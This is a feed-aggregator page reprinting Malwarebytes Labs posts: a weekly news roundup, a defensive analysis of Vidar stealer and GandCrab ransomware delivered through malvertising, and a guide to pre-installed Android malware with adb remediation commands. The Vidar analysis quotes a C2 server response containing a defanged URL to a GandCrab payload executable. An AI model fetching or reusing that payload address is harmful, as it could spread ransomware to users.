Malwarebytes - Mon, 01/07/2019 - 17:33

Last week on Labs, we looked back at 2018 as the year of data breaches, homed in on pre-installed malware on mobile devices, and profiled a malicious duo, Vidar and GandCrab.

Other cybersecurity news
  • 2019’s first data breach: It took less than 24 hours. An unauthorized third-party downloaded 30,000 details of Australian public servants in Victoria. It was believed that a government employee was phished prior to the breach. (Source: CBR Online)
  • Dark Overlord hackers release alleged 9/11 lawsuit documents. The hacker group known as The Dark Overlord (TDO) targeted law firms and banks related to the 9/11 attack. TDO has a history of releasing stolen information after receiving payment for its extortions. (Source: Sophos’ Naked Security Blog)
  • Data of 2.4 million Blur password manager users left exposed online. 2.4 million users of the password manager, Blur, were affected by a data breach that happened in mid-December of last year and publicly revealed on New Year’s Eve. No passwords stored in the managers were exposed. (Source: ZDNet)
  • Hacker leaked data on Angela Merkel and hundreds of German lawmakers. A hacker leaked sensitive information, which includes email addresses and phone numbers, of Angela Merkel, senior German lawmakers, and other political figures on Twitter. The account was suspended following this incident. (Source: TechCrunch)
  • Hackers seize dormant Twitter accounts to push terrorist propaganda. Dormant Twitter accounts are being hacked and used to further push terrorist propaganda via the platform. It’s easy for these hackers to guess the email addresses of these accounts since Twitter, by default, reveals partly-concealed addresses which clue them in. (Source: Engadget)
  • MobSTSPY spyware weaseled its way into Google Play. Another spyware app made its way into Google Play and onto the mobile devices of thousands of users. The malware steals SMS messages, call logs, contact lists, and other files. (Source: SC Magazine UK)
  • Apple phone phishing scams getting better. A new phone-based scam targeting iPhone users was perceived to likely fool many because the scammer’s fake call is lumped together with a record of legitimate calls from Apple Support. (Source: KrebsOnSecurity)
  • Staying relevant in an increasingly cyber world. Small- to medium-sized businesses may not have the upper hand when it comes to hiring people with talent in cybersecurity, but this shouldn’t be an organization’s main focus. Dr. Kevin Harris, program director of cybersecurity for the American Military University, advised that employers must focus on giving all their employees “cyber skills.” (Source: Federal News Network)
  • Adobe issues emergency patch following December miss. Adobe released an out-of-band patch to address critical vulnerabilities in Acrobat and Reader. (Source: Dark Reading)

Stay safe, everyone!

The post A week in security (December 31, 2018 – January 6, 2019) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Vidar and GandCrab: stealer and ransomware combo observed in the wild

Malwarebytes - Fri, 01/04/2019 - 18:15

We have been tracking a prolific malvertising campaign for several weeks and captured a variety of payloads, including several stealers. One that we initially identified as Arkei turned out to be Vidar, a new piece of malware recently analyzed in detail by Fumik0_ in his post: Let’s dig into Vidar – An Arkei Copycat/Forked Stealer (In-depth analysis).

In Norse Mythology, Víðarr is a god and son of Odin, whose death it is foretold he will avenge. Being referred to as “The Silent One” seems to be fitting for this stealer that can loot from browser histories (including Tor Browser) and cryptocurrency wallets, capture instant messages, and much more.

We witnessed a threat actor using the Fallout exploit kit to distribute Vidar. But victims won’t notice that as much, as the secondary and noisier payload being pushed is GandCrab ransomware.


A malvertising chain leads us to the Fallout exploit kit followed by what we thought was an Arkei stealer. Upon closer look, while the sample did share a lot of similarities with Arkei (including network events), it was actually a newer and, at the time, not yet publicly described piece of malware now identified as Vidar.

Beyond Vidar’s stealer capabilities, we also noticed a secondary payload that was retrieved from Vidar’s own command and control (C2) server. The infection timeline showed that victims were first infected with Vidar, which tried to extract confidential information, before eventually being compromised with the GandCrab ransomware.

Malvertising and Fallout exploit kit

Torrent and streaming video sites drive a lot of traffic, and their advertising is often aggressive and poorly-regulated. A malicious actor using a rogue advertising domain is redirecting these site visitors according to their geolocation and provenance to at least two different exploit kits (Fallout EK and GrandSoft EK), although the former is the most active.

Stealers such as AZORult seem to be the a favorite payload here, but we also noticed that Arkei/Vidar was quite common. In this particular instance, we saw Vidar being pushed via the Fallout exploit kit.


It should be noted that Vidar is sold as a product, and as such can be distributed by several different threat groups through different campaigns.

Vidar customers can customize the stealer via profiles, which gives them a way to adjust which kind of data they are interested in. Beyond the usual credit card numbers and other passwords stored in applications, Vidar can also scrape an impressive selection of digital wallets.

Upon execution on the system, Vidar will search for any data specified in its profile configuration and immediately send it back to the C2 server via an unencrypted HTTP POST request.

This includes high level system details (specs, running processes, and installed applications) and stats about the victim (IP address, country, city, and ISP) stored in a file called information.txt. This file is packaged along with other stolen data and zipped before being sent back to the C2 server.

GandCrab as a loader

Vidar also offers to download additional malware via its command and control server. This is known as the loader feature, and again, it can be configured within Vidar’s administration panel by adding a direct URL to the payload. However, not all instances of Vidar (tied to a profile ID) will download an additional payload. In that case, the server will send back a response of “ok” instead of a URL.

HTTP/1.1 200 OK Date: Content-Type: text/html; charset=UTF-8 Connection: keep-alive Server: Pro-Managed Content-Length: 51 http://ovz1.fl1nt1kk.10301.vps.myjino[.]ru/topup.exe;

Within about a minute after the initial Vidar infection, the victim’s files will be encrypted and their wallpaper hijacked to display the note for GandCrab version 5.04.

Ransomware as a last payload

While ransomware experienced a slowdown in 2018, it is still one of the more dangerous threats. In contrast to many other types of malware, ransomware is instantly visible and requires a call to action, whether victims decide to pay the ransom or not.

However, threat actors can use ransomware for a variety of reasons within their playbook. It could be, for instance, a simple decoy where the real goal is to irreversibly corrupt systems without any way to recover lost data. But as we see here, it can be coupled with other threats and used as a last payload when other resources have already been exhausted.

As a result, victims get a double whammy. Not only are they robbed of their financial and personal information, but they are also being extorted to recover the now encrypted data.

Malwarebytes users are protected against this threat at multiple levels. Our signatureless anti-exploit engine mitigates the Internet Explorer and Flash Player exploits delivered by the Fallout exploit kit. We detect the dropped stealer as Spyware.Vidar and also thwart GandCrab via our anti-ransomware module.


Many thanks to Fumik0_ and @siri_urz for their inputs and Vidar payload identification.

Indicators of Compromise (IOCs)

Vidar binary


Vidar C2


Loader URL (GandCrab)


GandCrab binary


The post Vidar and GandCrab: stealer and ransomware combo observed in the wild appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The new landscape of pre-installed mobile malware: malicious code within

Malwarebytes - Wed, 01/02/2019 - 18:15

Here’s a scary thought: Mobile devices may soon come with pre-installed malware on required system apps. While it might sound like a grim foretelling, pre-installed mobile malware is an unfortunate reality of the future.

In the past, we’ve seen pre-installed malware with the notorious Adups threat, among others. “Pre-installed” means the malware comes already installed on a device at the system level, thus, it cannot be removed; only disabled. However, remediating these iterations of pre-installed malware is possible by using a work-around to uninstall apps for the current user. This method involves connecting the mobile device to a PC and using the ADB command line tool. Follow our guide, removal instructions for Adups, to find out more.

Although this method is a bit tedious, it works to remediate the malware. In contrast, remediating newer versions of pre-installed malware has become much more difficult. We are now seeing malware authors target system apps that are required for the device to function properly. By injecting malicious code within these necessary apps, threat actors have reshaped the landscape of pre-installed malware for the worse.

Types of pre-installed apps

There are two types of preinstalled apps, based on the apps’ location on the device. This location also determines the importance of the app.

The first location is /system/app/. Apps in this location are typically something you want to have, but not critical for the device to run. For example, apps that contain functionally for the camera, Bluetooth, FM radio on the device, or photo viewing are stored in this location. This location is also where device manufactures cache what some may consider bloatware. Uninstalling some of these apps may degrade the user experience, but it isn’t going to stop the device from functioning.

The other location is /system/priv-app/. This is where significantly important apps reside. For instance, apps like settings and system UI, which include the functionality for the back/home buttons on Android devices, are stored here. In other words, apps you absolutely cannot uninstall these without essentially breaking the phone. Sadly, the latest pre-installed malware is targeting this location.

The evidence

In the light of this new, frightening pre-installed malware, let’s look at two case studies.

Case study 1: Riskware auto installer within System UI

The device is a THL T9 Pro. The infection is Android/PUP.Riskware.Autoins.Fota.INS. Although the code looks similar to the well-known preinstalled malware Adups, it’s entangled within the critical system app System UI, instead of being in a standalone app like a UpgradeSys. The infection causes headaches, as it repeatedly installs variants of Android/Trojan.HiddenAds. It’s unknown if this is the doing of Adups themselves, or on the other hand, if code was taken from the Adups Auto Installer and inserted into System UI. Neither scenario is good.

Case Study 2: Monitor within settings

This time, the device is a UTOK Q55. The infection is Android/Monitor.Pipe.Settings. The category “Monitor” is a subset of Potentially Unwanted Programs (PUPs). As the name implies, Monitor apps collect and report sensitive information from the device. Furthermore, this particular Monitor app is hardcoded in the highly-important Settings app. In effect, the app used to uninstall other apps would need to be uninstalled itself to remediate—pure irony.

Attempting to remediate

Here lays the biggest problem with these infections—there is currently no good way to remediate. I have worked with several customers with these infections, but despite my attempts, I have yet to find a good work around. However, I can offer some guidance. If a clean version of the system app can be found to replace the malicious version, you might be able to replace it. You will want to look for system apps that match the current Android OS version of the device.  If found, you can try using the following method:

  • Read the disclaimer from the removal instructions for Adups.
  • Follow the steps under Restoring apps onto the device (without factory reset) in the removal instructions for Adups to save the proper <full path of the apk> of the system app to be replaced.
  • Download a clean version of the system app to your PC.
    • You can use the popular site VirusTotal to determine if it’s clean or not.
  • Move the system app from your PC to your device.
    • adb push <PC file path>\<filename of clean version.apk> /sdcard/Download/<filename of clean version.apk>
  • Uninstall the old, malicious version of the system app.
    • adb shell pm uninstall -k –user 0 <package name of malicious system app>
  • Install the new version of the system app.
    • adb shell pm install -r –user 0 /sdcard/Download/<filename of clean version.apk>
  • See if it works.
    • Common failure errors:
    • If the new version fails to install, you can revert to the old system app.
      • adb shell pm install -r –user 0 <full path of the apk saved from second step>

As noted above, I have yet to find a version of any of the infections encountered that successfully installs. If you need assistance, feel free to post on our forum Mobile Malware Removal Help & Support.

What really can be done?

Currently, the best method to deal with these infections is to:

  1. Stay away from devices with these infections. Here are the manufacturers/models we have seen so far that have been impacted:
    • THL T9 Pro
    • UTOK Q55
    • BLU Studio G2 HD
  2. If you already bought one, return the device.
  3. If you already bought the device and can’t return it, contact the manufacturer.
Extreme frustration

As a mobile malware researcher, it pains me to no end to write about malware we can’t currently remediate.  However, the public needs to know that these types of infections exist in the wild. No one should have to tolerate such infections on any mobile device regardless of its price point and/or notoriety. I will continue to look for methods to deal with these infections. In the meantime, stay safe out there.

APK samples

Detection: Android/PUP.Riskware.Autoins.Fota.INS
MD5: 9E0BBF6D26B843FB8FE95FDAD582BB70
Package Name:

Detection: Android/Monitor.Pipe.Settings
MD5: DC267F396FA6F06FC7F70CFE845B39D7
Package Name:

The post The new landscape of pre-installed mobile malware: malicious code within appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds